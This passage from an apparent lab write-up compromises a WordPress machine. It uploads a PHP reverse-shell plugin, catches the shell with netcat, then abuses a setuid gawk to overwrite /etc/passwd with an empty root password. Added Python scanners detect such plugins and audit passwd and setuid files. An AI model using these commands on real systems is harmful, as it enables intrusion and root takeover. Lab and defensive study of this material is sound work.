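The plugin above is the textbook shape of a malicious WordPress plugin: a plausible header (WordPress only needs a `Plugin Name:` line to list and activate a file) wrapped around calls that a "restrict access to xmlrpc.php" plugin has no reason to make. The following added example (my own code, not from the original post) scans the PHP files of a plugins directory for exactly that combination: a plugin header plus socket, process or eval primitives. The indicator lists and the scoring are my assumptions, and the two plugin sources are constructed samples, not files from the machine.

```python
import os
import re

# Constructed samples standing in for files under wp-content/plugins/.
BENIGN_PLUGIN = """<?php
/*
Plugin Name: Disable XML-RPC
Description: Turns off the XML-RPC interface.
*/
add_filter('xmlrpc_enabled', '__return_false');
"""

SUSPICIOUS_PLUGIN = """<?php
/*
Plugin Name: Restrict XMLRPC Access
Description: Restricts access to xmlrpc.php.
*/
function restrict_xmlrpc_access() {
    $sock = @fsockopen($config['ip'], $config['port'], $errno, $errstr, 30);
    $process = proc_open('/bin/sh -i', [0 => $sock, 1 => $sock, 2 => $sock], $pipes);
}
add_action('init', 'restrict_xmlrpc_access');
"""

HEADER_RE = re.compile(r"^\s*Plugin Name:\s*(?P<name>.+)$", re.MULTILINE)

# PHP primitives grouped by what they give an attacker. The grouping is my own;
# extend it for your environment (e.g. base64_decode + eval chains).
INDICATORS = {
    "network": ["fsockopen", "stream_socket_client", "curl_exec", "socket_create"],
    "process": ["proc_open", "popen", "shell_exec", "passthru", "system", "exec"],
    "eval":    ["eval", "assert", "create_function"],
}
# A function call: an identifier (optionally silenced with @) followed by "(".
CALL_RE = re.compile(r"(?<![\w$])@?(?P<fn>[A-Za-z_]\w*)\s*\(")


def scan_plugin_source(source):
    """Return {category: [indicator functions called]} for one PHP source string."""
    called = {m["fn"].lower() for m in CALL_RE.finditer(source)}
    hits = {}
    for category, names in INDICATORS.items():
        found = sorted(called & set(names))
        if found:
            hits[category] = found
    return hits


def risk_score(hits):
    """One point per indicator; a socket plus a spawned process is the reverse-shell shape."""
    score = sum(len(v) for v in hits.values())
    if "network" in hits and "process" in hits:
        score += 5
    return score


def scan_plugins(plugins):
    """plugins: {relative path: source}. Findings for files carrying a plugin header."""
    findings = []
    for path, source in plugins.items():
        header = HEADER_RE.search(source)
        if not header:
            continue      # not a plugin main file; WordPress would not list it
        hits = scan_plugin_source(source)
        if hits:
            findings.append({"path": path, "plugin": header["name"].strip(),
                             "indicators": hits, "score": risk_score(hits)})
    return sorted(findings, key=lambda f: -f["score"])


def load_plugin_dir(root):
    """Read every .php file under a plugins directory into {relative path: source}."""
    sources = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    sources[os.path.relpath(full, root)] = fh.read()
    return sources


if __name__ == "__main__":
    sample = {"disable-xmlrpc/plugin.php": BENIGN_PLUGIN,
              "restrict-xmlrpc/reverse.php": SUSPICIOUS_PLUGIN}
    for f in scan_plugins(sample):
        print(f"score={f['score']:2d} {f['path']} ({f['plugin']}): {f['indicators']}")
```

On a live host run `scan_plugins(load_plugin_dir("/var/www/html/wordpress/wp-content/plugins"))`; the benign "Disable XML-RPC" sample shows what the legitimate version of this plugin needs, a single `add_filter('xmlrpc_enabled', '__return_false')`, and it produces no finding. Treat a hit with both `network` and `process` indicators as an incident, not a false positive to be triaged later.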
The file now exists in /home/kali, as shown below; it is then zipped so that it can be uploaded through the WordPress plugin installer.
┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Documentos Escritorio Imágenes Música Plantillas Público reverse.php Vídeos
┌──(root㉿kali)-[/home/kali]
└─# zip -r reverse.zip reverse.php
adding: reverse.php (deflated 53%)
┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Escritorio Música Público reverse.zip
Documentos Imágenes Plantillas reverse.php Vídeos
We open a listener on port 443 to receive the reverse shell, as shown below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.1.1] from escolares.dl [192.168.1.100] 56990
/bin/sh: 0: can't access tty; job control turned off
$ sh: turning off NDELAY mode
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@a1c2470680a5:/var/www/html/wordpress$ ^Z
zsh: suspended nc -lvp 443
└─# stty raw -echo;fg
[1] + continued nc -lvp 443
reset xterm
www-data@a1c2470680a5:/var/www/html/wordpress$ ^Z
www-data@a1c2470680a5:/var/www/html/wordpress$ export SHELL=BASH
www-data@a1c2470680a5:/var/www/html/wordpress$ export TERM=xterm
www-data@a1c2470680a5:/var/www/html/wordpress$ sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@a1c2470680a5:/var/www/html/wordpress$
www-data@a1c2470680a5:/var/www/html/wordpress$ ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
www-data@a1c2470680a5:/var/www/html/wordpress$ cd ..
www-data@a1c2470680a5:/var/www/html$ ls
index.html info.php wordpress
www-data@a1c2470680a5:/var/www/html$ cd ..
www-data@a1c2470680a5:/var/www$ ls
html
www-data@a1c2470680a5:/var/www$ cd ..
www-data@a1c2470680a5:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
www-data@a1c2470680a5:/var$ cd ..
www-data@a1c2470680a5:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@a1c2470680a5:/$
www-data@a1c2470680a5:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@a1c2470680a5:/$ cd /home/
www-data@a1c2470680a5:/home$ ls
ubuntu
www-data@a1c2470680a5:/home$ cd ubuntu/
bash: cd: ubuntu/: Permission denied
www-data@a1c2470680a5:/home$
www-data@a1c2470680a5:/$ cd /opt/
www-data@a1c2470680a5:/opt$ ls
www-data@a1c2470680a5:/opt$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/gawk
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@91e20a37658b:/$ cd /tmp/
www-data@91e20a37658b:/tmp$ cp /etc/passwd .
www-data@91e20a37658b:/tmp$ ls
passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
4. Use the command /usr/bin/gawk '{ print > "/etc/passwd"}' passwd to overwrite the real file with our modified copy (gawk is setuid root, so it writes /etc/passwd as root). After that we can become root without entering the root password, as shown below.
www-data@91e20a37658b:/tmp$ /usr/bin/gawk '{ print > "/etc/passwd"}' passwd
www-data@91e20a37658b:/tmp$ cat /etc/passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
_galera:x:102:65534::/nonexistent:/usr/sbin/nologin
mysql:x:103:104:MariaDB Server,,,:/nonexistent:/bin/false
luisillo:x:1001:1001:,,,:/home/luisillo:/bin/bash
www-data@91e20a37658b:/tmp$ su root
root@91e20a37658b:/tmp#
root@91e20a37658b:/tmp# whoami
root
root@91e20a37658b:/tmp#
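The whole escalation rests on two host misconfigurations that a periodic audit catches in seconds: a setuid bit on a binary that can write arbitrary files (gawk), and an /etc/passwd whose root entry has an empty password field after the overwrite. The following added example (my own code, not from the original post) checks both. The passwd text and SUID list are constructed samples mirroring the output above, and the EXPECTED_SUID allowlist is an assumption for the example; derive yours from a clean build of the same image.

```python
# Constructed sample inputs. The passwd text mirrors the tampered file shown above
# (root's password field emptied); the SUID list mirrors the find output above.
TAMPERED_PASSWD = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
luisillo:x:1001:1001:,,,:/home/luisillo:/bin/bash
"""

SUID_BINARIES = [
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/chfn", "/usr/bin/mount",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/gawk", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
]

# Binaries that carry the setuid bit on a stock Ubuntu image (assumed allowlist).
# gawk is deliberately absent: a setuid awk can open any file for writing as root,
# which is exactly how /etc/passwd was overwritten above.
EXPECTED_SUID = {
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/chfn", "/usr/bin/mount",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}


def audit_passwd(text):
    """Return (line number, account, problem) for passwd entries that weaken root access."""
    issues = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            issues.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            # 'su' accepts the account with no password at all, as shown above
            issues.append((lineno, name, "empty password field (login without password)"))
        elif pw != "x" and not pw.startswith(("!", "*")):
            issues.append((lineno, name, "password hash stored in passwd instead of shadow"))
        if uid == "0" and name != "root":
            issues.append((lineno, name, "extra UID 0 account"))
    return issues


def audit_suid(paths, expected=EXPECTED_SUID):
    """Return setuid binaries that are not on the allowlist."""
    return sorted(set(paths) - expected)


if __name__ == "__main__":
    for issue in audit_passwd(TAMPERED_PASSWD):
        print("passwd:", issue)
    for path in audit_suid(SUID_BINARIES):
        print("unexpected setuid binary:", path)
```

On a real host feed `audit_passwd(open("/etc/passwd").read())` and the output of `find / -perm -4000 -type f 2>/dev/null` to `audit_suid`; the fix for the first finding is `passwd -l root` (or restoring the file from backup), and for the second `chmod u-s /usr/bin/gawk`.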
Thank you very much for reading this article
I hope you liked and learned something new
This article has been written for ethical purposes
Good Hack